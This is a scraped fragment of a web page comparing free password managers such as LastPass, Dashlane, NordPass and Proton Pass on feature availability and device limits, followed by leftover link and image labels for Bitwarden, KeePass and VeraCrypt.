Manual/3rd-party

Yes

Yes

3rd-party

Yes

Yes

Manual

No built-in sync/cloud

LastPass Free

Yes

One device type

Yes

No

Yes

Yes

Yes

Yes

Only one device type at a time

Zoho Vault

Yes

Yes

Yes

No

Yes

Yes

Yes

Yes

Some team features paid

Dashlane Free

Yes

One device only

Yes

No

Yes

Yes

Yes

Yes

One device only

NordPass Free

Yes

One device at time

Yes

No

Yes

Yes

Yes

Yes

One device at a time

RoboForm Free

Yes

No

Yes

No

Yes

Yes

Yes

Yes

No multi-device sync

Proton Pass

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Some features may be paid later

LogMeOnce

Yes

Yes

Yes

No

Yes

Yes

Yes

Yes

Some features paid

Bitwarden Screenshot
KeePass Main Window
official VeraCrypt website
Official VeraCrypt Documentation
VeraCrypt Forums
Security Audits and Updates
VeraCrypt Boot Loader
VeraCrypt Screenshot